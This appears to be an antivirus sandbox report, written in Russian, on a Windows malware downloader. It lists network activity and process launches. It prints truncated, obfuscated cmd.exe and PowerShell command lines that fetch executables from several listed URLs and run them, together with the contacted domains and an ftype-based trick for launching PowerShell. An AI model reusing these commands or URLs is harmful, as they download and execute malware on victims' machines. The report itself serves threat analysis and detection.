Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /V:O/C"set d32= }}{hctac}}kaerb;Bij$ ssecorP-tratS;)Bij$(elifotevas.nCD$;)ydoBesnopser.rwb$(etirw.nCD$;1 = epyt.nCD$;)(nepo.nCD${ )'*ZM*' ekil- txetesnopser.rwb$( fI;)(dnes.rwb$...
Сетевая активность
Подключается к
- 'bu###uoranje.nl':80
- 'be###family.com':80
TCP
Запросы HTTP GET
- http://bu###uoranje.nl/yKOo
- http://be###family.com/HL9hiD8
UDP
- DNS ASK bi#####rokerblog.com
- DNS ASK bu###uoranje.nl
- DNS ASK ca###s-web.com
- DNS ASK be###family.com
- DNS ASK al##n.pt
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:O/C"set d32= }}{hctac}}kaerb;Bij$ ssecorP-tratS;)Bij$(elifotevas.nCD$;)ydoBesnopser.rwb$(etirw.nCD$;1 = epyt.nCD$;)(nepo.nCD${ )'*ZM*' ekil- txetesnopser.rwb$( fI;)(dnes.rwb$...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /S /D /c" echo powershell $Xfc='zwj';$uuC='http://bi#####rokerblog.com/f@http://bureauoranje.nl/yKOo@http://campus-web.com/nzi@http://bendafamily.com/HL9hiD8@http://align.pt/MeH'.Split('@');$ji...
- '<SYSTEM32>\cmd.exe' /S /D /c" FOR /F "delims=MF.sK tokens=3" %y IN ('ftype^|find "lMod"') DO %y -"
- '<SYSTEM32>\cmd.exe' /c ftype|find "lMod"
- '<SYSTEM32>\cmd.exe' /S /D /c" ftype"
- '<SYSTEM32>\find.exe' "lMod"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' =zwj
